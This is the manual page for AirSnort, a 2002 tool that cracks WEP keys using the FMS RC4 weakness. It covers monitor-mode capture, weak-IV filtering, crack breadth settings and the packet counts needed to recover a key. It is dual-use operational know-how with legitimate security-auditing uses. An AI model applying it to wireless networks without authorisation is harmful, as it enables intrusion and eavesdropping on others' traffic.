1AIRSNORT(1)               BSD General Commands Manual              AIRSNORT(1)
2

NAME

4     airsnort — WEP key cracking tool
5

SYNOPSIS

7     airsnort
8

DESCRIPTION

10     airsnort is a WEP key cracking tool designed to exploit the RC4 schedul‐
11     ing weakness discussed by Fluhrer, Mantin, and Shamir (FMS) and first
12     exploited by Stubblefield et al.
13
14     - Running AirSnort
15
16     Once launched, airsnort must be configured to work with your wireless nic
17     and to make crack attempts according to your desires. In order to prop‐
18     erly capture packets, first indicate the name of your wireless networking
19     device in the "Network device" field.  This will be something like
20     "wlanX" for cards that use the wlan-ng drivers and "ethX" for other
21     cards. Next select the type of card that you are using in the "Card type"
22     drop down box.  Available choices are Prism2, Orinoco, and other.  Cisco
23     cards fall into the other category.  The purpose if this field is primar‐
24     ily to inform airsnort how to place your nic into monitor mode. In moni‐
25     tor mode a wireless nic gathers all packets indiscriminately, and no
26     association with an access point is required. For wlan-ng and orinoco_cs
27     based nics, monitor mode is entered automatically when the 'Start' button
28     is clicked to initiate a capture session. Other card types must be put
29     into monitor mode outside of airsnort, prior to clicking Start.
30
31     Choose between "scan" mode to scan through all 11 802.11b channels at a
32     regular interval, or "channel mode to monitor a specific channel. Note
33     that in either case it is quite possible to receive packets that bleed
34     through from neighboring channels.
35
36     - Capture Details
37
38     Capture uses the pcap library to receive monitor mode packets.  The pack‐
39     ets go through two filters. First, non-encrypted packets are filtered
40     out. Then, if they are encrypted, useless packets (those without a weak
41     IV) are discarded. All non-data packets are discarded with the exception
42     of 802.11b Beacon and probe response packets which are examined in order
43     to obtain access point SSID data.
44
45     To distinguish encrypted and non-encrypted packets, capture examines the
46     first two bytes of the output. Since unencrypted IP packets have a first
47     pair value of 0xAAAA (part of the SNAP), all of these packets get
48     dropped.
49
50     For a description of what constitutes an interesting packet please refer
51     to the FMS paper and its discussion of "weak IVs"
52
53     - Cracking Details
54
55     Cracking attempts are made in parallel with packet capture.  Currently,
56     the cracker attempts to crack the captured packets for both a 40 bit and
57     128 bit key each time 10 new weak IVs are seen for a given access point.
58     Airsnort uses a probabalistic attack, so, the best guess may not be the
59     right one. With limited captured data and enough CPU power, you can per‐
60     form more exaustive searches. The search for a key involves a depth first
61     traversal of an n-ary tree. The depth of tree is 5 for 40 bit key
62     attempts and 13 for 128 bit key attempts. The breadth of the trees is
63     governed by the 40 and 128 bit crack depth fields in the airsnort gui. A
64     breadth parameter of 'n' instructs airsnort to try the n most likely val‐
65     ues at each key position using statistics derived from the IVs that have
66     been collected. Large breadth setting can result in very slow processing
67     time for crack attempts default values of 3 for 40 bit cracks and 2 for
68     128 bit cracks are recommended for starters. If a large number of weak
69     IVs have been gathered (> 1500 if a 40 bit key is suspected, > 3000 if a
70     128 bit key is suspected), you may want to try increasing the breadth
71     values.
72
73     The number of interesting packets needed to perform a successful crack
74     depends on two things; luck and key length. Assuming that luck is on your
75     side, the key length is the only important factor. For a key length of
76     128 bits, this translates to about 1500 packets. For other key lengths,
77     assume 115 packets per byte of the key. Some keys are more resistant to
78     this technique than others and may require far more packets.  If you have
79     a lot of packets and no key, either wait for more packets or try a larger
80     breadth.
81
82     In any case, if the cracker believes it has a correct password, it checks
83     the checksum of a random packet. If this is successful, the correct pass‐
84     word is printed in ASCII and Hex, and the successful crack is indicated
85     by an 'X' in the leftmost column of the display.
86
87     When executing the cracking operation, crack operates with a partial key
88     search from the given data. Since it is a probabalistic attack, The best
89     guess may not be the right one, so, with limited captured data and enough
90     CPU power, you can perform more exaustive searches.  By setting the
91     breadth parameter, you can specify to search "worse" guesses. It is not
92     suggested that you specify a breadth of more than three or four.
93
94     - Save and Restore
95
96     Airsnort saves data in two formats. All packets captured by aisrnort can
97     be saved in pcap dump file format by selecting the "Log to file" option
98     from the File menu.  This must be done before a capture session is initi‐
99     ated. Airsnort can also save a much smaller amount of data of data about
100     a capture session in the form of "crack" files.  These files represent
101     the minimum amount of data that airsnort maintains for each access point
102     that it discovers.  Crack files contain summary data of those packets
103     that airsnort has seen that actually use weak IVs. Airsnort will always
104     ask the user to save data to a crack file whenever the program is termi‐
105     nated.  By using save files, airsnort session can effectively be paused
106     and resumed at a later time by first loading the save file, then starting
107     a capture session. Restoration of data from a pcap dump file amounts to
108     replaying the entire capture session from which the dump file was cre‐
109     ated, all statistics will reflect what was seen during the live capture
110     session. Restoration of data from a crack file will only display statis‐
111     tics about packets that use weak IVs, thus packet counts are likely to be
112     much smaller than seen during the live capture.  It is possible to load a
113     pcap dump file and create a corresponding crack file in order to reduce
114     the amount of stored data.
115

SEE ALSO

117     gencases(1) decrypt(1)
118

AUTHORS

120     Jeremy Bruestle <melvin@melvin.net>
121     Blake Hegerle <blake@melvin.net>
122     Snax <snax@shmoo.com>
123
124Linux                           August 18, 2002                          Linux
Impressum